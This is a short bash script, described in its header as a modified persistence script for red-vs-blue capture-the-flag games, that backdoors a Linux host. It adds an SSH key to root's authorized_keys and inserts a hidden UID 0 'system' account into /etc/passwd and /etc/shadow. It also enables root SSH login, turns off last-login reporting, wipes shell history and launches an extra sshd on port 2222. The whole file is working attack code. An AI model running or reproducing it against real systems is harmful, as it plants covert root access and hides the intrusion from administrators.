#!/bin/bash
# Modified version of flaviu's persistence script for use in red vs blue CTFs. 

if [ -z "${HOME:-}" ]; then export HOME="$(cd ~ && pwd)"; fi
uid=$(id -u)
if [ -n "${uid}" ] && [ $uid -ge "0" ] ; then
        admin_port=2222
        administration_key='[SSH_KEY] system key generated by server 20220226'
        locateUser='system:$y$j9T$1Hpev8PUGDuvH4Q64dTlB/$io7yC5HPu/t8I2NxfN4Mm9iL11oPzlCF07pH95E/R71:19049::99999:7:::'
        inFile='/etc/shadow'
        lUName='system:x:0:0:system:/root:/bin/bash'
        uNFile='/etc/passwd'
        dir_ssh='/root/.ssh/'
        dir_ssh_k="${dir_ssh}authorized_keys"
        sshd_file=`which sshd`
        
        outc=$(unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHOST REMOTEHOST REMOTEUSER WATCH;history -n;export  HISTFILE=/dev/null; history -c)

        if [[ -d $dir_ssh ]]; then
        echo "" >/dev/null &
    else
        mkdir $dir_ssh  >/dev/null 2>&1
    fi
    if [[ -f $dir_ssh_k ]]; then
        echo "" >/dev/null &
    else
        touch $dir_ssh_k  >/dev/null 2>&1
    fi
        grep -qF -- "${administration_key}" "${dir_ssh_k}" || echo "${administration_key}" >> "${dir_ssh_k}"
        grep -qF -- "$locateUser" "$inFile" || grep -qF -- "$locateUser" "$inFile" || sed -i '2 i\system:$y$j9T$1Hpev8PUGDuvH4Q64dTlB/$io7yC5HPu/t8I2NxfN4Mm9iL11oPzlCF07pH95E/R71:19049::99999:7:::' /etc/shadow
        grep -qF -- "$lUName" "$uNFile" || grep -qF -- "$lUName" "$uNFile" || sed -i '2 i\system:x:0:0:system:/root:/bin/bash' /etc/passwd
        sed -i '/^PermitRootLogin/s/no/yes/' /etc/ssh/sshd_config >/dev/null 2>&1
        sed -i '/^PrintLastLog/s/yes/no/' /etc/ssh/sshd_config >/dev/null 2>&1
		systemctl restart ssh
		$sshd_file -p 2222 &
fi
